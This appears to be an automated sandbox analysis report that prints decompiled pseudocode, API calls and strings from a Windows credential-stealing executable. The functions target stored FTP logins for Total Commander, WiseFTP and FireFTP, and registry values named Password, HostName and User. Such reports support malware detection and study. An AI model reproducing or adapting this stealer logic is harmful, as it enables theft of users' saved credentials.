				intOrPtr _v16;
				int _t37;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t54;
				void* _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t62;
				void* _t79;
				void* _t80;
				void* _t81;

				_t81 = __edi;
				_t80 = __ecx;
				_t79 = __ebx;
				_v8 = E004015F0(_a4, 2, 0);
				_v12 = E004018CF(0x105);
				_t37 = GetWindowsDirectoryA(_v12, 0x104);
				if(_t37 == 0) {
					L3:
					E004018B8(_v12);
				} else {
					_t84 = _t37 - 0x104;
					if(_t37 > 0x104) {
						goto L3;
					} else {
						E00404B1E(_a4, _v12); // executed
					}
				}
				_t39 = E00401EB1(_t84, 0x28); // executed
				E00404B1E(_a4, _t39); // executed
				_t41 = E00401EB1(_t84, 0x1a); // executed
				_t42 = _t41;
				_t85 = _t42;
				if(_t42 != 0) {
					E00404B1E(_a4, E00401E4C(_t42, _t42, "\\GHISLER")); // executed
				}
				_t43 = E00401EB1(_t85, 0x23); // executed
				_t44 = _t43;
				_t86 = _t44;
				if(_t44 != 0) {
					E00404B1E(_a4, E00401E4C(_t44, _t44, "\\GHISLER")); // executed
				}
				_t45 = E00401EB1(_t86, 0x1c); // executed
				_t46 = _t45;
				if(_t45 != 0) {
					E00404B1E(_a4, E00401E4C(_t46, _t46, "\\GHISLER")); // executed
				}
				_t47 = E00401D71( *0x414869, "Software\\Ghisler\\Windows Commander", "InstallDir", 0); // executed
				E00404B1E(_a4, _t47);
				_t50 = E00401D71( *0x414869, "Software\\Ghisler\\Windows Commander", "FtpIniName", 0);
				if(_t50 != 0) {
					_v16 = _t50;
					E00404B07(_a4, _v16);
					E004018B8(_v16);
				}
				_t51 = E00401D71( *0x414869, "Software\\Ghisler\\Total Commander", "InstallDir", 0); // executed
				E00404B1E(_a4, _t51);
				_t54 = E00401D71( *0x414869, "Software\\Ghisler\\Total Commander", "FtpIniName", 0);
				if(_t54 != 0) {
					_v16 = _t54;
					E00404B07(_a4, _v16);
					E004018B8(_v16);
				}
				_t55 = E00401D71(0x80000002, "Software\\Ghisler\\Windows Commander", "InstallDir", 0); // executed
				E00404B1E(_a4, _t55);
				_t57 = E00401D71(0x80000002, "Software\\Ghisler\\Windows Commander", "FtpIniName", 0); // executed
				_t58 = _t57;
				if(_t58 != 0) {
					_v16 = _t58;
					E00404B07(_a4, _v16);
					E004018B8(_v16);
				}
				_t59 = E00401D71(0x80000002, "Software\\Ghisler\\Total Commander", "InstallDir", 0); // executed
				E00404B1E(_a4, _t59);
				_t61 = E00401D71(0x80000002, "Software\\Ghisler\\Total Commander", "FtpIniName", 0); // executed
				_t62 = _t61;
				_t91 = _t62;
				if(_t62 != 0) {
					_v16 = _t62;
					E00404B07(_a4, _v16);
					E004018B8(_v16);
				}
				return E00401636(_t79, _t80, _t81, _t91, _a4, _v8);
			}

0x00404c51
0x00404c51
0x00404c51
0x00404c63
0x00404c70
0x00404c80
0x00404c82
0x00404c98
0x00404c9b
0x00404c84
0x00404c84
0x00404c89
0x00000000
0x00404c8b
0x00404c91
0x00404c91
0x00404c89
0x00404ca2
0x00404cab
0x00404cb2
0x00404cb7
0x00404cb7
0x00404cb9
0x00404cca
0x00404cca
0x00404cd1
0x00404cd6
0x00404cd6
0x00404cd8
0x00404ce9
0x00404ce9
0x00404cf0
0x00404cf5
0x00404cf7
0x00404d08
0x00404d08
0x00404d1f
0x00404d28
0x00404d44
0x00404d46
0x00404d48
0x00404d51
0x00404d59
0x00404d59
0x00404d70
0x00404d79
0x00404d95
0x00404d97
0x00404d99
0x00404da2
0x00404daa
0x00404daa
0x00404dc0
0x00404dc9
0x00404ddf
0x00404de4
0x00404de6
0x00404de8
0x00404df1
0x00404df9
0x00404df9
0x00404e0f
0x00404e18
0x00404e2e
0x00404e33
0x00404e33
0x00404e35
0x00404e37
0x00404e40
0x00404e48
0x00404e48
0x00404e59

APIs

Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD

GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404C7B

Strings

Software\Ghisler\Total Commander, xrefs: 00404D65, 00404D85, 00404E05, 00404E24
InstallDir, xrefs: 00404D0F, 00404D60, 00404DB1, 00404E00
\GHISLER, xrefs: 00404CBB, 00404CDA, 00404CF9
FtpIniName, xrefs: 00404D2F, 00404D80, 00404DD0, 00404E1F
Software\Ghisler\Windows Commander, xrefs: 00404D14, 00404D34, 00404DB6, 00404DD5

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocDirectoryLocalWindows
String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
API String ID: 3186838798-3636168975
Opcode ID: d9f4a13bbe22218abea59ec36b5e0dd8197697bfcb02beac9bb27fde15afba29
Instruction ID: 43e3b734b20d4af43a7562869c4868c7ee74a92454cd73f3ffe9b37604960ea0
Opcode Fuzzy Hash: d9f4a13bbe22218abea59ec36b5e0dd8197697bfcb02beac9bb27fde15afba29
Instruction Fuzzy Hash: E841EEB4A80608BAEF123B62CC43FDD7A66DF80744F60857B7A10750F2DABD99509A5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040491B, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040491B(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				long _t38;
				long _t39;
				long _t42;

				_t38 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
				_t39 = _t38;
				if(_t39 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t42 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t43 = _t42;
						if(_t42 != 0) {
							break;
						}
						_v2068 = E00401DF8( &_v2064, E00401DF8(_t43, _a8, "\\"),  &_v2064);
						E004018B8(_t44);
						_v2080 = E00401D71( *0x414869, _v2068, "Password", 0);
						_v2072 = E00401D71( *0x414869, _v2068, "HostName", 0);
						_v2076 = E00401D71( *0x414869, _v2068, "User", 0);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v2072), _a4, _v2076), _a4, _v2080);
						}
						E004018B8(_v2080);
						E004018B8(_v2072);
						E004018B8(_v2076);
						E0040491B(_a4, _v2068);
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t39;
			}

0x00404931
0x00404936
0x00404938
0x0040493e
0x00404945
0x00404945
0x00404965
0x0040496a
0x0040496c
0x00000000
0x00000000
0x00404990
0x00404996
0x004049b3
0x004049d1
0x004049ef
0x004049fc
0x00404a42
0x00404a42
0x00404a4d
0x00404a58
0x00404a63
0x00404a71
0x00404a7c
0x00404a81
0x00404a81
0x00000000
0x00404a8c
0x00404a92

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00404931
RegEnumKeyExA.ADVAPI32 ref: 00404965
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404A8C

Strings

User, xrefs: 004049D9
Password, xrefs: 0040499D
HostName, xrefs: 004049BB

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostName$Password$User
API String ID: 1332880857-1253078594
Opcode ID: d50ab80f77cd9ee8984736a31060d6c067cbe76ee4c381ea4d49959f18991d6e
Instruction ID: 70a3f47a41d3c5b7bb25802f3bcf3ab2eab4f79ca17ead1258ab74d3b4d68c93
Opcode Fuzzy Hash: d50ab80f77cd9ee8984736a31060d6c067cbe76ee4c381ea4d49959f18991d6e
Instruction Fuzzy Hash: B131F37594011CBADF22AB61CC02BDD7ABABF84304F10C4BAB544750F1DB795B92AF88

Uniqueness

Uniqueness Score: -1.00%

Function 00408E0D, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00408E0D(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				long _t34;
				long _t35;
				long _t38;
				intOrPtr _t46;
				intOrPtr _t50;
				void* _t57;

				_t57 = __ecx;
				_t34 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t35 = _t34;
				if(_t35 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t38 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t39 = _t38;
						if(_t38 != 0) {
							break;
						}
						_v2068 = E00401DF8( &_v2064, E00401DF8(_t39, _a12, "\\"),  &_v2064);
						E004018B8(_t40);
						_v2072 = E00401D71(_a8, _v2068, 0, 0);
						_t46 = E0040242B(__eflags, _v2072);
						__eflags = _t46;
						if(_t46 == 0) {
							L8:
							E004018B8(_v2072);
							E00408E0D(_t57, _a4, _a8, _v2068);
							E004018B8(_v2068);
							_v12 = _v12 + 1;
							continue;
						}
						_push(_t46);
						_v2076 = _t46;
						_t50 = E00401F7E(_v2076);
						__eflags = _t50;
						if(_t50 != 0) {
							E00404351(_a4, _v2076, "wiseftpsrvs.ini", 0xbeef0002);
							E00404351(_a4, _v2076, "wiseftp.ini", 0xbeef0002);
							E00404351(_a4, _v2076, "wiseftpsrvs.bin", 0xbeef0000);
						}
						E004018B8();
						goto L8;
					}
					return RegCloseKey(_v8);
				}
				return _t35;
			}

0x00408e0d
0x00408e20
0x00408e25
0x00408e27
0x00408e2d
0x00408e34
0x00408e34
0x00408e54
0x00408e59
0x00408e5b
0x00000000
0x00000000
0x00408e7f
0x00408e85
0x00408e9c
0x00408ead
0x00408ead
0x00408eaf
0x00408f14
0x00408f1a
0x00408f2b
0x00408f36
0x00408f3b
0x00000000
0x00408f3b
0x00408eb1
0x00408eb2
0x00408ebe
0x00408ec3
0x00408ec5
0x00408eda
0x00408ef2
0x00408f0a
0x00408f0a
0x00408f0f
0x00000000
0x00408f0f
0x00000000
0x00408f46
0x00408f4c

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408E20
RegEnumKeyExA.ADVAPI32 ref: 00408E54
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408F46

Strings

wiseftp.ini, xrefs: 00408EE4
wiseftpsrvs.bin, xrefs: 00408EFC
wiseftpsrvs.ini, xrefs: 00408ECC

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
API String ID: 1332880857-3184955129
Opcode ID: 26a2837719ac650df69141e5573d33545b2da118860850cdd9de88edb11d1a45
Instruction ID: 379df70dab51ed1233c69cde4acd9fbee75a0c7acd1daed002fcfe2591656a96
Opcode Fuzzy Hash: 26a2837719ac650df69141e5573d33545b2da118860850cdd9de88edb11d1a45
Instruction Fuzzy Hash: 9031E33190010DBADF21AB61CD42FDD7ABABF40304F1084BAB654B41E1DE799B91AF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040A875, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040A875(intOrPtr _a4) {
				void* _v8;
				void* _v12;
				short _v44;
				WCHAR* _v48;
				char _v52;
				char _v56;
				short _v60;
				char* _t34;
				short* _t45;
				void* _t47;

				_t34 =  &_v8;
				_push(_t34);
				_push(0x4162cf);
				_push(5);
				_push(0);
				_push(0x4162bf); // executed
				L004107A2(); // executed
				if(_t34 < 0) {
					L15:
					return E0040A712(_t47, _a4, L"http://www.facebook.com/", 0);
				}
				_push( &_v12);
				_push(_v8);
				if( *((intOrPtr*)( *_v8 + 0x1c))() < 0 || _v12 == 0) {
					L14:
					 *((intOrPtr*)( *_v8 + 8))(_v8);
					goto L15;
				} else {
					_v48 = 0;
					_v44 = 0;
					_v52 = 0x28;
					while(1) {
						_v56 = 0;
						_push( &_v56);
						_push( &_v52);
						_push(1);
						_push(_v12);
						if( *((intOrPtr*)( *_v12 + 0xc))() != 0 || _v56 != 1) {
							break;
						}
						if(_v48 != 0) {
							_t45 = StrStrIW(_v48, 0x4162ef);
							if(_t45 == 0) {
								_v60 = 0;
							} else {
								 *_t45 = 0;
								_v60 = _t45;
							}
							E0040A712(_t47, _a4, _v48, _v60); // executed
							_push(_v48);
							L0041079C();
							if(_v44 != 0) {
								_push(_v44);
								L0041079C();
							}
						}
					}
					 *((intOrPtr*)( *_v12 + 8))(_v12);
					goto L14;
				}
			}

0x0040a87b
0x0040a87e
0x0040a87f
0x0040a884
0x0040a886
0x0040a888
0x0040a88d
0x0040a894
0x0040a95a
0x0040a96a
0x0040a96a
0x0040a8a2
0x0040a8a3
0x0040a8ab
0x0040a94f
0x0040a957
0x00000000
0x0040a8bb
0x0040a8bb
0x0040a8c2
0x0040a8c9
0x0040a8d0
0x0040a8d0
0x0040a8df
0x0040a8e3
0x0040a8e4
0x0040a8e6
0x0040a8ee
0x00000000
0x00000000
0x0040a8fa
0x0040a909
0x0040a90b
0x0040a917
0x0040a90d
0x0040a90d
0x0040a912
0x0040a912
0x0040a927
0x0040a92c
0x0040a92f
0x0040a938
0x0040a93a
0x0040a93d
0x0040a93d
0x0040a938
0x0040a942
0x0040a94c
0x00000000
0x0040a94c

APIs

73D4B690.OLE32(004162BF,00000000,00000005,004162CF,?), ref: 0040A88D
StrStrIW.SHLWAPI(00000000,004162EF), ref: 0040A904
73D5A680.OLE32(00000000,00000000,004162EF), ref: 0040A92F
73D5A680.OLE32(00000000,00000000,00000000,004162EF), ref: 0040A93D

Strings

(, xrefs: 0040A8C9
http://www.facebook.com/, xrefs: 0040A95C

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: A680$B690
String ID: ($http://www.facebook.com/
API String ID: 4266887374-3677894361
Opcode ID: e4386c61c5d52dae3f91afb7c524ba0f41b393633d994220be84190847cd43a6
Instruction ID: fb31eb5c0df78cdbf00d2063a309b2630a064c869b031c3f749717a331f3c059
Opcode Fuzzy Hash: e4386c61c5d52dae3f91afb7c524ba0f41b393633d994220be84190847cd43a6
Instruction Fuzzy Hash: 5D312A70A00209EBDF119F94C889FDEFB75BF44314F208566E40076290D3799E95DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00409DCB, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409DCB(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t12;
				void* _t23;
				void* _t24;
				void* _t25;

				_t25 = __edi;
				_t24 = __ecx;
				_t23 = __ebx;
				_v8 = E004015F0(_a4, 0x25, 0);
				_t12 = E00401EB1(__eflags, 0x1a);
				_t27 = _t12;
				if(_t12 != 0) {
					E00404351(_a4, E00401E4C(_t12, _t12, "\\Mozilla\\Firefox\\"), "fireFTPsites.dat", 0xbeef1000); // executed
					E004018B8(_t20);
				}
				 *0x416030 = 1;
				GetCurrentDirectoryA(0x104,  &_v269);
				E00409C3C(_t24, _a4,  *0x414869, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				E00409C3C(_t24, _a4, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				SetCurrentDirectoryA( &_v269);
				return E00401636(_t23, _t24, _t25, _t27, _a4, _v8);
			}

0x00409dcb
0x00409dcb
0x00409dcb
0x00409de0
0x00409dea
0x00409dea
0x00409dec
0x00409e08
0x00409e0d
0x00409e0d
0x00409e12
0x00409e28
0x00409e45
0x00409e61
0x00409e6d
0x00409e7e

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409E28
SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409E6D

Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Strings

Software\Mozilla, xrefs: 00409E37, 00409E54
\Mozilla\Firefox\, xrefs: 00409DEE, 00409E2D, 00409E4A
fireFTPsites.dat, xrefs: 00409DFF
Firefox, xrefs: 00409E32, 00409E4F

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
API String ID: 3007406096-624000163
Opcode ID: baf3640e4e59c84cdb8530a01f1c66f88f8b17e9021d25bd85c5b007fc2217b5
Instruction ID: 7ca379dd8bd6ced9b34700e741701d984c4c6656734aaf013cc51c489d735693
Opcode Fuzzy Hash: baf3640e4e59c84cdb8530a01f1c66f88f8b17e9021d25bd85c5b007fc2217b5
Instruction Fuzzy Hash: E1011E70680209BADF21BB61CC47FDE3A699B44744F11807E7A04B51E3DFB9CA909A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00409C3C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409C3C(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, char* _a16, intOrPtr _a20) {
				void* _v8;
				char* _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _t37;
				long _t41;
				void* _t48;
				void* _t49;
				intOrPtr _t51;
				void* _t59;

				_t59 = __ecx;
				if(StrStrIA(_a12, _a16) != 0) {
					_t48 = E00401D71(_a8, _a12, "PathToExe", 0); // executed
					_t49 = _t48;
					_t61 = _t49;
					if(_t49 != 0) {
						_push(_t49);
						_t51 = E0040242B(_t61, _t49);
						_t62 = _t51;
						if(_t51 != 0) {
							_v28 = _t51;
							_t54 = E00401EB1(_t62, 0x1a);
							if(E00401EB1(_t62, 0x1a) != 0) {
								E00409AC1(_a4, E00401E4C(_t54, _t54, _a20), _v28);
								E004018B8(_t56);
							}
							E004018B8(_v28);
						}
						E004018B8();
					}
				}
				_v12 = E004018CF(0x800);
				_t37 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				if(_t37 == 0) {
					_v20 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t41 = RegEnumKeyExA(_v8, _v20, _v12,  &_v16, 0, 0, 0, 0);
						_t42 = _t41;
						if(_t41 != 0) {
							break;
						}
						_v24 = E00401E4C(E00401DF8(_t42, _a12, "\\"), _t43, _v12);
						E00409C3C(_t59, _a4, _a8, _v24, _a16, _a20);
						E004018B8(_v24);
						_v20 = _v20 + 1;
					}
					RegCloseKey(_v8);
				}
				return E004018B8(_v12);
			}

0x00409c3c
0x00409c4f
0x00409c5e
0x00409c63
0x00409c63
0x00409c65
0x00409c67
0x00409c6e
0x00409c6e
0x00409c70
0x00409c72
0x00409c7c
0x00409c7e
0x00409c91
0x00409c96
0x00409c96
0x00409c9e
0x00409c9e
0x00409ca3
0x00409ca3
0x00409c65
0x00409cb2
0x00409cbf
0x00409cc6
0x00409cc8
0x00409ccf
0x00409ccf
0x00409ceb
0x00409cf0
0x00409cf2
0x00000000
0x00000000
0x00409d0c
0x00409d1e
0x00409d26
0x00409d2b
0x00409d2b
0x00409d33
0x00409d33
0x00409d41

APIs

StrStrIA.SHLWAPI(?,?), ref: 00409C48
RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
RegEnumKeyExA.ADVAPI32 ref: 00409CEB
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33

Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482

Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Strings

PathToExe, xrefs: 00409C53

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
String ID: PathToExe
API String ID: 3012581338-1982016430
Opcode ID: 0d496da54591456cbef0a006f5e3d3f3319e3d22a83b4c503ccc3a2f1cc45d87
Instruction ID: 26fdae1b99b3a41fd3c75be40dc832e850ec111ed163878dae6f9528ba595cbd
Opcode Fuzzy Hash: 0d496da54591456cbef0a006f5e3d3f3319e3d22a83b4c503ccc3a2f1cc45d87
Instruction Fuzzy Hash: BE310F7195410ABAEF017FA1CD42EEE7F75EF04304F104436BA10750F2DA799A60AB59

Uniqueness

Uniqueness Score: -1.00%

Function 004027F7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E004027F7(void* __ecx, void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				void* _v16;
				char _v277;
				void* __ebx;
				void* __ebp;
				void* _t23;
				void* _t24;
				long _t27;
				void* _t32;
				void* _t35;
				void* _t36;
				void** _t41;
				void** _t42;
				void* _t44;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;

				_t53 = __edi;
				_t52 = __edx;
				_t51 = __ecx;
				_t23 = E00401D71( *0x414869, "Software\\WinRAR", _a4, _a8); // executed
				_t24 = _t23;
				if(_t24 != 0) {
					return _t24;
				}
				_t50 = 0;
				_t27 = GetTempPathA(0x104,  &_v277);
				if(_t27 == 0) {
					L12:
					return _t50;
				}
				_t56 = _t27 - 0x104;
				if(_t27 <= 0x104) {
					E00401000( &_v8, _t51, _t56,  &_v8);
					_t32 = E004025A9( &_v277);
					_t57 = _t32;
					if(_t32 != 0) {
						_t35 = E00401DF8( &_v277,  &_v277, _a4);
					} else {
						_t35 = E00401E4C(E00401DF8( &_v277,  &_v277, "\\"), _t49, _a4);
					}
					_push(_t35);
					_push(_v8);
					_push(_t35); // executed
					_t36 = E0040120D(_t35, _t57); // executed
					_t37 = _t36;
					_t58 = _t36;
					if(_t36 != 0) {
						_v12 = E00401082(_t37, _t53, _t58, _v8);
						if(_v12 != 0) {
							_t41 =  &_v16;
							_push(_t41);
							_push(_v8);
							L00410790();
							if(_t41 >= 0) {
								GlobalFix(_v16);
								_t42 = _t41;
								_t61 = _t42;
								if(_t42 != 0) {
									_t50 = E004018CF(_v12);
									_t44 = _t42;
									E00401906(_t44, _t50, _v12);
									GlobalUnWire(_v16);
									_push(_v12);
									_pop( *__eax);
								}
							}
						}
					}
					E00401021(E004018B8(), _t50, _t51, _t52, _t61, _v8);
				}
			}

0x004027f7
0x004027f7
0x004027f7
0x00402812
0x00402817
0x00402819
0x004028fb
0x004028fb
0x0040281f
0x00402832
0x00402834
0x004028f7
0x00000000
0x004028f7
0x0040283a
0x0040283f
0x00402849
0x00402855
0x0040285a
0x0040285c
0x00402884
0x0040285e
0x00402873
0x00402873
0x00402889
0x0040288a
0x0040288d
0x0040288e
0x00402893
0x00402893
0x00402895
0x0040289f
0x004028a6
0x004028a8
0x004028ab
0x004028ac
0x004028af
0x004028b6
0x004028bb
0x004028c0
0x004028c0
0x004028c2
0x004028cd
0x004028cf
0x004028d5
0x004028dd
0x004028e5
0x004028e8
0x004028e8
0x004028c2
0x004028b6
0x004028a6
0x004028f2
0x004028f2

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 0040282D
73D83240.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004028AF
GlobalFix.KERNEL32 ref: 004028BB
GlobalUnWire.KERNEL32 ref: 004028DD

Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40

Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94

Strings

Software\WinRAR, xrefs: 00402807

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$Globallstrcatlstrcpy$D83240PathTempWire
String ID: Software\WinRAR
API String ID: 1367430239-224198155
Opcode ID: fffe50fdf767dd8ea32efbb047cc9c8ce0fda29c0e5d1d40fdb022eba92d0d02
Instruction ID: b236df76ed398757315f06d6d85d08d7d8e67b150c60cd6550e710cec1d30196
Opcode Fuzzy Hash: fffe50fdf767dd8ea32efbb047cc9c8ce0fda29c0e5d1d40fdb022eba92d0d02
Instruction Fuzzy Hash: 01211D76900109BBDF55BBA1CD46EDEBB69AF04348F108576B600B10E1D6B98B94AB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040480D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040480D(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				int _v2072;
				char _v2076;
				long _t31;
				long _t32;
				intOrPtr _t44;

				_t31 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
				_t32 = _t31;
				if(_t32 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0,  &_v2072, 0, 0) != 0) {
							break;
						}
						if(_v2072 == 1 || _v2072 == 7) {
							if(StrStrIA( &_v2064, "Line") == 0) {
								L13:
								_v12 = _v12 + 1;
								continue;
							}
							_t44 = E00401D71( *0x414869, _a8,  &_v2064,  &_v2076);
							if(_t44 == 0) {
								goto L13;
							}
							_v2068 = _t44;
							E00401569(_a4, 0xbeef0001);
							if(_v2072 != 1) {
								E00401569(_a4, 1);
							} else {
								E00401569(_a4, 0);
							}
							E0040159F(_a4, _v2068, _v2076);
							E004018B8(_v2068);
							goto L13;
						} else {
							_v12 = _v12 + 1;
							continue;
						}
					}
					return RegCloseKey(_v8);
				}
